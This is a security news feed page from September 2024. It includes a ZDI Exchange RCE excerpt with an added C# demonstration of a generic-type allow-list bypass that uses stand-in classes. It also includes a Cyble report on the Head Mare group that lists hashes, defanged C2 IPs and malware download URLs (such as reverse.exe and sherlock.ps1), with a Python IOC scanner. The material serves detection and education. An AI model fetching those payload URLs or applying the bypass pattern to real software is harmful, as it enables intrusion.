In this blog post, I have described both CVE-2023-21529 and CVE-2023-32031. In those vulnerabilities, I abused an allow-listed class and a class missing from the deny list to achieve RCE on Exchange. That wasn’t the end of my Exchange vulnerability research, though. I still had two additional full-RCE chains that I was able to deliver after the CVE-2023-32031 patch. In the next blog post, I will provide you with full details on the ZDI-23-1419/CVE-2023-36756 RCE vulnerability. Once again, you can watch my entire OffensiveCon 2024 talk here. Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.
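The allow-list flaw the post describes, as an added example that is not code from the ZDI post or from Exchange: a hypothetical Wrapper<T> stands in for MultiValuedProperty<T> (its constructor reflects on T's public static Parse(string), as the ValueConvertor.ConvertValue path does), a hypothetical Sink stands in for XamlReader, and a hypothetical TypeAllowList contrasts a check that validates only the open generic definition with one that also validates every type argument. The allow-list contents, the Wrapper/Sink/TypeAllowList names and the attacker string are assumptions; the real allow list and deny list are not reproduced here.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;

// Hypothetical allow-list checker (not Exchange's UnitySerializationHolderSurrogateSelector),
// modelling the two ways an allow list can treat a closed generic type.
static class TypeAllowList
{
    // The open generic Wrapper<> is allow-listed, as MultiValuedProperty<T> was in Exchange.
    static readonly HashSet<Type> AllowedGenerics = new HashSet<Type> { typeof(List<>), typeof(Wrapper<>) };
    static readonly HashSet<Type> AllowedTypes = new HashSet<Type> { typeof(string), typeof(int) };

    // Flawed: validates only the open generic definition, never its type arguments.
    public static bool IsAllowedShallow(Type t)
    {
        if (AllowedTypes.Contains(t)) return true;
        return t.IsGenericType && AllowedGenerics.Contains(t.GetGenericTypeDefinition());
    }

    // Fixed: the definition must be allowed and every type argument must pass the same check.
    public static bool IsAllowedDeep(Type t)
    {
        if (AllowedTypes.Contains(t)) return true;
        if (!t.IsGenericType) return false;
        if (!AllowedGenerics.Contains(t.GetGenericTypeDefinition())) return false;
        return t.GetGenericArguments().All(IsAllowedDeep);
    }
}

// Hypothetical stand-in for MultiValuedProperty<T>. Like the path the post describes
// (ValueConvertor.ConvertValue -> TryParseConversion), a string input is converted to T
// by looking up T's public static Parse(string) via reflection and invoking it.
class Wrapper<T>
{
    public T Value { get; }

    public Wrapper(object raw)
    {
        if (raw is string s)
        {
            MethodInfo parse = typeof(T).GetMethod(
                "Parse", BindingFlags.Public | BindingFlags.Static, null, new[] { typeof(string) }, null);
            if (parse == null)
                throw new InvalidOperationException(typeof(T) + " has no public static Parse(string)");
            Value = (T)parse.Invoke(null, new object[] { s });
        }
        else
        {
            Value = (T)raw;
        }
    }
}

// Stand-in for a dangerous Parse sink such as System.Windows.Markup.XamlReader.Parse(string).
// It only records that it was reached; the real sink would process the attacker's XAML gadget.
class Sink
{
    public static int Calls;
    public static Sink Parse(string s) { Calls++; return new Sink(); }
}

static class Program
{
    static void Main()
    {
        // The attacker names the closed type Wrapper<Sink>: the open generic is allowed,
        // but the type argument Sink is on no list at all.
        Type attackerType = typeof(Wrapper<Sink>);
        Console.WriteLine("shallow check allows Wrapper<Sink>: " + TypeAllowList.IsAllowedShallow(attackerType)); // True
        Console.WriteLine("deep check allows Wrapper<Sink>:    " + TypeAllowList.IsAllowedDeep(attackerType));    // False

        if (TypeAllowList.IsAllowedShallow(attackerType))
        {
            // Single-argument constructor call, which PowerShell Remoting deserialization permits
            // for any allowed type; the argument is the attacker-controlled string.
            Activator.CreateInstance(attackerType, new object[] { "<attacker-controlled string>" });
            Console.WriteLine("Sink.Parse reached: " + Sink.Calls + " time(s)"); // 1
        }
    }
}
```

The shallow check is what lets the attacker's string reach Sink.Parse; the deep check rejects Wrapper<Sink> while still admitting an ordinary List<string>. A deny list bolted onto the conversion step, as in the first patch the post discusses, would only block Sink if someone had thought to list it, which is exactly the gap the Command class fell through.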
by Zero Day Initiative Blog
2024-09-05 15:37:49
Lowe’s employees phished via Google ads. Criminals are impersonating MyLowesLife, Lowe's HR portal for current and former employees.
by Malwarebytes Labs
2024-09-05 15:32:41
RansomHub Leads, Lockbit Declines in Global Ransomware Attacks. Industrials, consumer cyclicals, and healthcare sectors remain primary targets, with North America bearing the brunt of attacks.
by ITPro Today
2024-09-05 15:31:50
Planned Parenthood partly offline after ransomware attack. Intermountain Planned Parenthood of Montana suffered a cyberattack which has been claimed by a ransomware group.
by Malwarebytes Labs
2024-09-05 15:22:13
Manufacturing Sector Is the Latest Target of Advanced Credential Harvesting Attacks. A new attack runs slow and steady, focused on compromising large manufacturing companies using contextual social engineering to trick victims into giving up credentials.
by KnowBe4
2024-09-05 15:21:58
Phishing is Still the Top Initial Access Vector. Phishing remains a top initial access vector for threat actors, according to researchers at ReliaQuest. Phishing and other social engineering tactics can bypass security technologies by targeting humans directly.
by KnowBe4
2024-09-05 15:10:39
How to Put Yourself Out There – Networking on Social Media. It is no surprise that growing your social network can help get your name out there and provide opportunities to advance your career. LinkedIn, one of the original career-focused networking […] The post How to Put Yourself Out There – Networking on Social Media appeared first on Black Hills Information Security.
by Black Hills Information Security
2024-09-05 15:08:30
How to Get a Job in Cybersecurity. by Gerald Auger of Simply Cyber // Guest Author. You want to break into cybersecurity? That’s AWESOME. I’ve been in the field for 20 years and I LOVE IT! But […] The post How to Get a Job in Cybersecurity appeared first on Black Hills Information Security.
by Black Hills Information Security
2024-09-05 15:08:22
Microchip Confirms Data Breach as Play Ransomware Leaks Stolen Docs. Microchip Technology Inc., a leading semiconductor manufacturer, disclosed a data breach following a cyberattack that compromised its IT infrastructure. The attack, claimed by the Play ransomware group, forced the company to partially shut down operations while it worked to restore critical systems. In an SEC filing dated September 4, 2024, the company reported that the … The post Microchip Confirms Data Breach as Play Ransomware Leaks Stolen Docs appeared first on CyberInsider.
by Cyber Insider
2024-09-05 14:55:29
UK Public Worried About Global Over-Reliance on IT Systems. A new survey examining public sentiment towards global IT and software providers in the aftermath of the July 2024 CrowdStrike IT outages reveals over three-quarters of people in the UK now worry about the heavy reliance of global organisations on IT systems and software providers. The research was conducted by OnePoll, on behalf of International […] The post UK Public Worried About Global Over Reliance on IT Systems appeared first on IT Security Guru.
by IT Security Guru
2024-09-05 14:49:00
NIST Cybersecurity Framework (CSF) and CTEM – Better Together. It’s been a decade since the National Institute of Standards and Technology (NIST) introduced its Cybersecurity Framework (CSF) 1.0. Created following a 2013 Executive Order, NIST was tasked with designing a voluntary cybersecurity framework that would help organizations manage cyber risk, providing guidance based on established standards and best practices. While this version was originally
by The Hacker News
2024-09-05 14:38:20
10 Critical PCI DSS Compliance Pitfalls Retailers Must Navigate. In today’s digital retail landscape, PCI DSS compliance is not just a regulatory requirement; it is a critical business imperative. As a seasoned QSA and security consultant with over two and a half decades of experience, I’ve witnessed firsthand the devastating impact of data breaches on businesses. Did you know that 60% of small businesses close within six...
by RH-ISAC
2024-09-05 14:33:05
The Rise of Head Mare: A Geopolitical and Cybersecurity AnalysisKey takeaways The Head Mare hacktivist group targets Russian and Belarusian organizations, linking their cyberattacks to geopolitical tensions with Ukraine. Head Mare''s attacks on Russia and Belarus are strategic, aiming to influence political and economic stability in these countries and support its own objectives. The group uses sophisticated phishing and ransomware attacks, exploiting vulnerabilities like CVE-2023-38831 in WinRAR and ransomware strains like LockBit and Babuk. Head Mare’s cyber operations align with the Russo-Ukrainian conflict, applying pressure on Russia and Belarus to distract from Ukraine''s military actions. The group employs advanced techniques for persistence and evasion, disguising malware and using sophisticated tools to control compromised systems. Head Mare uses the Sliver framework to manage compromised systems, ensuring their command-and-control infrastructure is resilient. Tools like Mimikatz are used to extract credentials, enhancing their control over targeted networks. Overview The Head Mare hacktivist group has emerged as a formidable digital adversary in today’s geopolitical conflicts. First reported in 2023 on X (previously Twitter), Head Mare has targeted Russian and Belarusian organizations. The group’s actions are not merely technical intrusions but are deeply entwined with the broader political tensions between these countries and their neighbors, particularly in the context of the ongoing Russo-Ukrainian conflict. Head Mare''s focus on Russian and Belarusian entities is a strategic choice rather than a coincidence. By targeting organizations within these nations, Head Mare aligns its cyber operations with the geopolitical friction between Russia, Belarus, and Ukraine. This approach reflects a deliberate attempt to influence the political and economic stability of these countries through cyber means, thus amplifying the existing geopolitical tensions. 
The group''s operations include deploying sophisticated phishing campaigns and ransomware attacks. By exploiting vulnerabilities like CVE-2023-38831 in WinRAR and utilizing ransomware strains such as LockBit and Babuk, Head Mare aims to destabilize key organizations within Russia and Belarus. The Geopolitical Angle of Head Mare’s Activities The geopolitical implications of Head Mare’s activities are evident in their choice of targets and methods. By focusing on Russian and Belarusian organizations, Head Mare is engaging in a form of cyber warfare that complements the broader Russo-Ukrainian conflict. The group''s attacks are likely intended to support Ukraine''s strategic objectives by applying additional pressure on Russia and Belarus. The Russian military''s struggles, especially following Ukraine’s recent offensive into Kursk, have heightened the need for strategic distractions. President Vladimir Putin has used Belarus to create a diversion, hoping that the buildup of Belarusian troops near the Ukrainian border would draw Ukrainian forces away from their offensive operations. Head Mare''s attacks fit into this geopolitical maneuvering by amplifying the pressure on Russia and Belarus. The situation on the ground further illustrates the intertwining of cyber operations and geopolitical strategy. In August, Belarusian President Alyaksandr Lukashenka announced the deployment of a significant portion of Belarus''s army to the Ukrainian border, citing concerns over a potential Ukrainian offensive. Lukashenka claimed this move was a response to a perceived build-up of Ukrainian troops, which he attributed to a misunderstanding of Belarus’s preparations for Independence Day celebrations. Despite the official narrative, Lukashenka’s actions are likely influenced by Moscow’s broader strategy. The Belarusian leader’s military deployment aligns with Putin’s attempt to create a strategic diversion. However, Belarus''s involvement in the conflict remains complex. 
Lukashenka’s regime is heavily dependent on Russian support, yet Belarusian society shows limited enthusiasm for direct involvement in the war against Ukraine. This lack of domestic support, combined with Lukashenka''s precarious political position, suggests that a full-scale Belarusian invasion of Ukraine remains unlikely. Technical Sophistication and Strategic Intent Head Mare''s cyber tactics reflect both technical sophistication and strategic intent. The group employs advanced phishing techniques to exploit vulnerabilities in widely used software, such as WinRAR. By deploying multiple malware types, Head Mare establishes a foothold in targeted systems, enabling further attacks and data collection. Persistence techniques are another hallmark of Head Mare’s operations. By adding malware samples to the Windows Run registry key or creating scheduled tasks, the group ensures that their malware remains active and continues to transmit data to their command-and-control servers. These methods not only enhance the group’s operational longevity but also contribute to the ongoing disruption. Detection evasion is a critical component of Head Mare’s strategy. The group disguises its malware as legitimate software, using deceptive filenames to bypass traditional security measures. This approach allows them to maintain a low profile while exerting a significant influence over compromised systems. Command and Control Infrastructure and Credential Theft Head Mare utilizes the Sliver framework for managing compromised systems, demonstrating a high level of sophistication in its cyber operations. Sliver enables the group to execute commands, manage connections, and navigate network restrictions effectively. By disguising its Sliver implants and using VPS/VDS servers, Head Mare ensures that its command-and-control infrastructure remains resilient and challenging to dismantle. Credential theft is another crucial aspect of Head Mare’s strategy. 
Tools like Mimikatz and XenArmor All-In-One Password Recovery Pro facilitate the extraction of credentials from compromised systems. This capability allows Head Mare to escalate its access and maintain control over targeted networks, amplifying its disruptive impact.

Head Mare's use of ransomware, including LockBit and Babuk, highlights its intent to cause maximum disruption. LockBit is deployed against Windows systems, while the Babuk build is designed for ESXi servers. Encrypting files and demanding ransoms serves both financial and operational purposes. By deploying multiple ransomware variants and encrypting files twice, Head Mare increases the complexity of recovery and intensifies the pressure on victims to comply with its demands.

Conclusion

Head Mare's cyber operations illustrate the evolving nature of cyber threats and their intersection with geopolitics. By targeting organizations in Russia and Belarus with sophisticated phishing and ransomware attacks, the group leverages its technical capabilities to influence political outcomes and create disruption. Head Mare's operations are a reflection of the broader geopolitical dynamics at play, with its cyber tactics serving as a means to exert political pressure and shape public perceptions. As the conflict between Russia and Ukraine continues to unfold, the role of cyber actors like Head Mare will likely remain an influential factor in international relations and security.

Recommendations and Mitigation

To counter the threats posed by Head Mare and similar actors, organizations should implement the following best practices:
- Continuously scan for vulnerabilities and apply patches promptly to mitigate the risk of exploitation.
- Maintain encrypted backups in isolated (offline or otherwise segregated) locations to safeguard against ransomware attacks.
- Use EDR solutions to detect and respond to malicious activity in real time.
- Educate employees on recognizing and avoiding phishing attempts and other cyber threats.
- Keep systems and software up to date with the latest security patches to reduce vulnerabilities.

Indicators of Compromise (IOCs)

The source table carried a Comments column that read "NA" for every indicator, so it is omitted here. Network indicators are defanged with "[.]" as published.

SHA-256:
201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8
9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69
08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470
6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263
33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A
5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03
9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0
5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9
DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA
053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD
2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921
015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343
9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546
22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3
2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569
AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F
9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836
B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984
92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50
664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38
311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86
4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271
2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50
DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E
EDA18761F3F6822C13CD7BEAE5AF2ED77A9B4F1DC7A71DF6AB715E7949B8C78B

IP:
188.127.237[.]46
45.87.246[.]169
45.87.245[.]30
185.80.91[.]107
188.127.227[.]201
5.252.176[.]47
45.11.27[.]232

URL:
188.127.237[.]46/winlog.exe
188.127.237[.]46/servicedll.exe
194.87.210[.]134/gringo/splhost.exe
194.87.210[.]134/gringo/srvhost.exe
94.131.113[.]79/splhost.exe
94.131.113[.]79/resolver.exe
45.156.21[.]178/dlldriver.exe
5.252.176[.]77/ngrok.exe
5.252.176[.]77/sherlock.ps1
5.252.176[.]77/sysm.elf
5.252.176[.]77/servicedll.rar
5.252.176[.]77/reverse.exe
5.252.176[.]77/soft_knitting.exe
5.252.176[.]77/legislative_cousin.exe
5.252.176[.]77/2000×2000.php

Sources:
https://jamestown.org/program/developments-on-belarus-ukraine-border-prompt-roller-coaster-of-reactions-in-minsk/
https://kyivindependent.com/belarus-moved-third-of-its-army-to-ukraine-border-due-to-independence-day-celebration-mixup-lukashenko-claims/
https://www.atlanticcouncil.org/blogs/ukrainealert/putin-hopes-belarus-border-bluff-can-disrupt-ukraines-invasion-of-russia/
https://www.aljazeera.com/news/2024/8/18/belarus-says-ukraine-amassing-troops-at-border-amid-incursion-into-russia
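The indicator list above is only useful once it is swept against your own telemetry. As an added example (not code from the Cyble report), the Python below takes a handful of the indicators exactly as published, undoes the "[.]" defanging, normalises them per type, and scans a few constructed proxy, firewall and EDR log lines for URL, IP and SHA-256 matches. The log format, the WS-0417 host name, the 10.x internal addresses and the timestamps are invented for the example; the indicator values are the ones listed above.

```python
import re
from dataclasses import dataclass, field

# A subset of the indicators published in the report above, copied verbatim
# in their defanged form ("[.]" instead of "."), one "<value> <type>" per line.
IOC_TEXT = """\
201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8 SHA-256
188.127.237[.]46 IP
5.252.176[.]47 IP
188.127.237[.]46/winlog.exe URL
5.252.176[.]77/sherlock.ps1 URL
"""

# Constructed sample telemetry (proxy, firewall and EDR events). Timestamps,
# host names and the internal 10.x addresses are invented for this example.
SAMPLE_LOGS = [
    "2024-09-03T08:14:02Z proxy src=10.20.30.41 dst=188.127.237.46 GET http://188.127.237.46/winlog.exe 200",
    "2024-09-03T08:14:09Z proxy src=10.20.30.41 dst=203.0.113.10 GET https://www.example.com/ 200",
    "2024-09-03T08:15:30Z edr host=WS-0417 event=file_create path=C:\\Users\\jdoe\\AppData\\Local\\Temp\\winlog.exe "
    "sha256=201f8dd57bce6fd70a0e1242b07a17f489c5f873278475af2eaf82a751c24fa8",
    "2024-09-03T08:16:11Z fw action=allow src=10.20.30.41 dst=5.252.176.47 dport=443",
    "2024-09-03T08:17:45Z proxy src=10.20.30.52 dst=5.252.176.77 GET http://5.252.176.77/sherlock.ps1 200",
]

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SHA256_RE = re.compile(r"\b[0-9a-fA-F]{64}\b")


@dataclass
class IocSet:
    hashes: set = field(default_factory=set)   # lower-case hex SHA-256 digests
    ips: set = field(default_factory=set)      # dotted-quad strings
    urls: set = field(default_factory=set)     # scheme-less "host/path", lower-case


def refang(value: str) -> str:
    """Undo the defanging used in threat reports so the value matches real telemetry."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def load_iocs(text: str) -> IocSet:
    """Parse '<value> <type>' lines into typed, refanged, normalised sets."""
    iocs = IocSet()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        value, kind = line.rsplit(None, 1)
        value = refang(value)
        if kind == "SHA-256":
            iocs.hashes.add(value.lower())
        elif kind == "IP":
            iocs.ips.add(value)
        elif kind == "URL":
            iocs.urls.add(value.lower())
    return iocs


def scan_line(line: str, iocs: IocSet) -> list:
    """Return de-duplicated (type, value) hits for one log line.

    URLs are compared without scheme or trailing slash, so the report entry
    "188.127.237[.]46/winlog.exe" matches "http://188.127.237.46/winlog.exe".
    """
    hits = []
    for url in URL_RE.findall(line):
        bare = re.sub(r"^https?://", "", url, flags=re.IGNORECASE).rstrip("/").lower()
        if bare in iocs.urls and ("URL", bare) not in hits:
            hits.append(("URL", bare))
    for ip in IP_RE.findall(line):
        if ip in iocs.ips and ("IP", ip) not in hits:
            hits.append(("IP", ip))
    for digest in SHA256_RE.findall(line):
        digest = digest.lower()
        if digest in iocs.hashes and ("SHA-256", digest) not in hits:
            hits.append(("SHA-256", digest))
    return hits


def scan_lines(lines, iocs: IocSet) -> list:
    """Return (line_number, line, hits) for every line with at least one IOC hit."""
    results = []
    for number, line in enumerate(lines, start=1):
        hits = scan_line(line, iocs)
        if hits:
            results.append((number, line, hits))
    return results


if __name__ == "__main__":
    for number, line, hits in scan_lines(SAMPLE_LOGS, load_iocs(IOC_TEXT)):
        print(f"line {number}: {hits}")
```

Run against the full list above and a SIEM export, it flags lines 1, 3, 4 and 5 of the sample: the download URL and its host, the dropped file's hash, a bare connection to a listed IP, and a fetch from 5.252.176[.]77, which is listed only as a URL host and therefore does not fire on the IP check. URL matching is exact by design, so a path variant such as the `/gringo/` entries needs its own row; the hash comparison is case-insensitive because EDR products disagree on digest casing.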
by CYBLE
2024-09-05 14:25:16
Businesses still ready to invest in Gen AI, with risk management a top priorityAccording to a Salesforce study, 87% of C-suite executives say implementing AI technology is a top business priority, but 93% acknowledge barriers to adoption in their organizations.
by ZDNET Security
2024-09-05 14:02:03
Few Have Tried OpenAI’s Google Killer. Here’s What They Think.OpenAI’s search tool shows promise but lacks Google’s specialized functions and can suffer from hallucinations.
by ITPro Today
2024-09-05 14:00:00
The Role of Trust Anchors in Modern IT SecurityTo fully realize the benefits trust anchors provide, organizations need to implement processes and technologies that maintain the privacy and security of trust anchors and the personal data they contain.
by Dark Reading
2024-09-05 13:59:31
Russian military hackers linked to critical infrastructure attacksThe United States and its allies have linked a group of Russian hackers (tracked as Cadet Blizzard and Ember Bear) behind global critical infrastructure attacks to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces (also known as GRU). [...]
by BleepingComputer
2024-09-05 13:53:18
MediaTek Chip Flaw Exposing Millions of Devices Gets Public ExploitA critical vulnerability (CVE-2024-20017) affecting MediaTek chipsets widely used in Wi-Fi 6 (802.11ax) devices has gained heightened attention following the publication of a proof-of-concept (PoC) exploit. The flaw, which received a CVSS score of 9.8, poses a severe security risk by allowing remote code execution (RCE) without any user interaction. The PoC was released by …
by Cyber Insider
2024-09-05 13:52:00
NCSC and allies call out Russia's Unit 29155 over cyber warfare
by ComputerWeekly
2024-09-05 13:15:02
Earth Lusca adds multiplatform malware KTLVdoor to its arsenalThe Chinese-speaking threat actor Earth Lusca used the new backdoor KTLVdoor in an attack against a trading company in China. Trend Micro Researchers spotted the Chinese-speaking threat actor Earth Lusca using a new multiplatform backdoor called KTLVdoor. The Earth Lusca group has been active since at least the first half of 2023, it primarily targeted […]
by Security Affairs
2024-09-05 13:15:00
Malware Attackers Using MacroPack to Deliver Havoc, Brute Ratel, and PhantomCoreThreat actors are likely employing a tool designated for red teaming exercises to serve malware, according to new findings from Cisco Talos. The program in question is a payload generation framework called MacroPack, which is used to generate Office documents, Visual Basic scripts, Windows shortcuts, and other formats for penetration testing and social engineering assessments. It was developed
by The Hacker News
2024-09-05 13:09:46
LiteSpeed Cache Flaw Exposes 6 Million WordPress Sites to Admin TakeoverA critical account takeover vulnerability in the LiteSpeed Cache plugin, affecting over 6 million WordPress sites, was patched yesterday with the release of version 6.5.0.1. The vulnerability allows unauthenticated users to take over logged-in accounts, including those with administrator privileges, by exploiting a debug log flaw. Security researcher Rafie Muhammad from Patchstack uncovered the issue …
by Cyber Insider
2024-09-05 13:00:27
Abusix Launches Guardian: Cutting-Edge Security Platform for Email and Network ProvidersBoston, MA, 5th September 2024, CyberNewsWire
by Hackread
2024-09-05 13:00:00
New report shows ongoing gender pay gap in cybersecurityThe gender gap in cybersecurity isn’t a new issue. The lack of women in cybersecurity and IT has been making headlines for years — even decades. While progress has been made, there is still significant work to do, especially regarding salary. The recent ISC2 Cybersecurity Workforce Study highlighted numerous cybersecurity issues regarding women in the […]
by Security Intelligence
2024-09-05 12:58:24
LiteSpeed Cache bug exposes 6 million WordPress sites to takeover attacksYet, another critical severity vulnerability has been discovered in LiteSpeed Cache, a caching plugin for speeding up user browsing in over 6 million WordPress sites. [...]
by BleepingComputer
2024-09-05 12:53:05
Transatlantic Cable podcast episode 362 | Kaspersky official blogEpisode 362 looks at X’s recent ban, voice-over theft and Apple’s big App store conundrum.
by Kaspersky
2024-09-05 12:52:51
Serverless Is Trending Again in Modern Application DevelopmentAfter a decline in interest, serverless computing is resurging, positioning it as a key technology for modern cloud-native development.
by ITPro Today
2024-09-05 12:49:25
Musician charged with $10M streaming royalties fraud using AI and botsNorth Carolina musician Michael Smith was indicted for collecting over $10 million in royalty payments from Spotify, Amazon Music, Apple Music, and YouTube Music using AI-generated songs streamed by thousands of bots in a massive streaming fraud scheme. [...]
by BleepingComputer
2024-09-05 11:52:33
Healthcare and HIPAA: How to Avoid AI-Related Privacy PitfallsAs AI and ML revolutionize healthcare, concerns over data privacy and HIPAA compliance underscore the need for stringent security measures and ethical data handling practices.
by ITPro Today
2024-09-05 11:45:55
Fake OnlyFans Checker Tool Infects Hackers with Lummac Stealer MalwareOnlyFans account hackers are finding themselves on the receiving end of a nasty cyber surprise.
by Hackread
2024-09-05 11:44:43
Microclouds: The Next Big Thing in Cloud Computing or Just Another Edge Strategy?Microclouds combine cloud convenience with edge infrastructure, offering preconfigured server clusters for easy deployment anywhere, but their future impact on cloud computing remains uncertain.
by ITPro Today
2024-09-05 11:44:36
Peek into Monthly Vulnerabilities: August 2024August 2024 again saw an uptick in the number of vulnerability disclosures, with several commonly exploited Common Vulnerabilities and Exposures (CVEs) across several platforms. Risk levels may be high, particularly on an enterprise scale, but the number of exploits seen this month demonstrates that there are active attempts to prevent them. This was another month […]
by ThreatMon
2024-09-05 11:38:13
Microchip Technology says its data was stolen amid alleged leaks onlineThe chipmaker said an unidentified attacker stole employee contact information and some encrypted and hashed passwords.
by Cybersecurity Dive
2024-09-05 11:30:06
Championing the Wins to Improve Wellbeing in the Cyber WorkplaceIt’s fair to say cyber security has a bad reputation. It’s portrayed as an industry full of stress, where sleepless nights are a prerequisite, and defenders have the weight of the world on their shoulders, while a world of adversaries work determinedly against them. As a frontline defender within the NHS, I can’t dispute some […]
by IT Security Guru
2024-09-05 11:00:00
Safeguarding Financial Data: Essential Cybersecurity Practices for Mobile BankingMobile app developers committed to upholding the highest security standards are faced with several considerations when developing and maintaining banking apps. Learn more.
by Zimperium
2024-09-05 10:40:31
White House launches cybersecurity hiring sprint to help fill 500,000 job openingsNational Cyber Director Harry Coker Jr. unveiled the program as part of an effort to fill a continued gap in cyber, technology and AI positions.
by Cybersecurity Dive
2024-09-05 10:33:00
New Cross-Platform Malware KTLVdoor Discovered in Attack on Chinese Trading FirmThe Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China. The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems. "KTLVdoor is a highly obfuscated malware that
by The Hacker News
2024-09-05 10:30:00
We Hunted Hidden Police Signals at the DNCUsing special software, WIRED investigated police surveillance at the DNC. We collected signals from nearly 300,000 devices, revealing vulnerabilities for both law enforcement and everyday citizens alike.
by WIRED Security News
2024-09-05 10:17:39
Veeam warns of critical RCE flaw in Backup & Replication softwareVeeam has released security updates for several of its products as part of a single September 2024 security bulletin that addresses 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One. [...]
by BleepingComputer
2024-09-05 10:10:00
Cisco Fixes Two Critical Flaws in Smart Licensing Utility to Prevent Remote AttacksCisco has released security updates for two critical security flaws impacting its Smart Licensing Utility that could allow unauthenticated, remote attackers to elevate their privileges or access sensitive information. A brief description of the two vulnerabilities is below - CVE-2024-20439 (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account
by The Hacker News
2024-09-05 10:02:17
Is Russian group APT28 behind the cyber attack on the German air traffic control agency (DFS)?A cyber attack hit the German air traffic control agency (DFS) disrupting its operations, experts attribute it to Russia-linked group APT28. A cyber attack targeted the German Air Traffic Control Agency (DFS), as reported by Spiegel and European Truth. DFS, based in Langen near Frankfurt, confirmed that attackers breached its office connection but confirmed that […]
by Security Affairs
2024-09-05 09:00:24
The SEC’s 2023 final rules on cybersecurity disclosuresNew rules to inform investors about cybersecurity attacks on public companies.
by Sophos News
2024-09-05 08:33:20
Quishing, an insidious threat to electric car ownersQuishing is a type of phishing attack where crooks use QR codes to trick users into providing sensitive information or downloading malware. In recent years, the spread of electric cars has led to an increase in public charging stations. However, new cyber threats have emerged with this growth, including “quishing.” This term, a combination of […]
by Security Affairs
2024-09-05 08:14:57
Novel RAMBO Side-Channel Attack Leaks Data Through RAM Radio WavesResearchers from the Ben-Gurion University of the Negev have uncovered a method to leak sensitive data from air-gapped systems, introducing a novel attack technique known as RAMBO (RAM-based electromagnetic covert channel). The attack exploits the electromagnetic emissions generated by a computer's RAM, allowing attackers to exfiltrate information like encryption keys, passwords, biometric data, and files. …
by Cyber Insider
2024-09-05 08:00:12
Tropic Trooper spies on government entities in the Middle EastKaspersky experts found a new variant of the China Chopper web shell from the Tropic Trooper group that imitates an Umbraco CMS module and targets a government entity in the Middle East.
by Securelist
2024-09-05 07:00:00
A global assessment of third-party connection tamperingCloudflare brings visibility to the practice of connection tampering as observed from our global network.
by Cloudflare
2024-09-05 07:00:00
Bringing insights into TCP resets and timeouts to Cloudflare RadarNew TCP resets and timeouts dataset on Cloudflare Radar surfaces connection tampering, scanning, DoS attacks, and more.
by Cloudflare
2024-09-05 06:52:00
Infosec spending to hit 3-year growth peak, reach $212B next year: GartnerThe continuation of annual double-digit growth rates, 15% next year, comes as organizations consolidate spending and reassess EPP and EDR needs.
by Cybersecurity Dive
2024-09-05 05:37:00
Canadian arrested by France after cooperating with US on Sky ECC cryptophone investigation
by ComputerWeekly
2024-09-05 05:15:20
Hacker trap: Fake OnlyFans tool backstabs cybercriminals, steals passwordsHackers are targeting other hackers with a fake OnlyFans tool that claims to help steal accounts but instead infects threat actors with the Lumma stealer information-stealing malware. [...]
by BleepingComputer
2024-09-05 04:01:00
Indian Army Propaganda Spread by 1.4K AI-Powered Social Media AccountsFor three years now, more than a thousand social media accounts have been reposting the same pro-India, anti-Pakistan content on Facebook and X.
by Dark Reading
2024-09-05 00:32:18
AI drives profit and revenue for MSPs and consultantsMultiple studies show that artificial intelligence (AI) is expected to increase revenues and profits for Managed Service Providers (MSPs). However, they also show that AI-enhanced security is struggling to keep up with AI-enhanced attacks.
by Barracuda
2024-09-05 00:00:00
Predator Spyware Infrastructure Returns Following Exposure and SanctionsIntellexa’s Predator spyware infrastructure re-emerges after sanctions. Learn how this mercenary spyware is evolving, targeting high-profile individuals, and what defensive measures can be taken.
by Recorded Future
2024-09-05 00:00:00
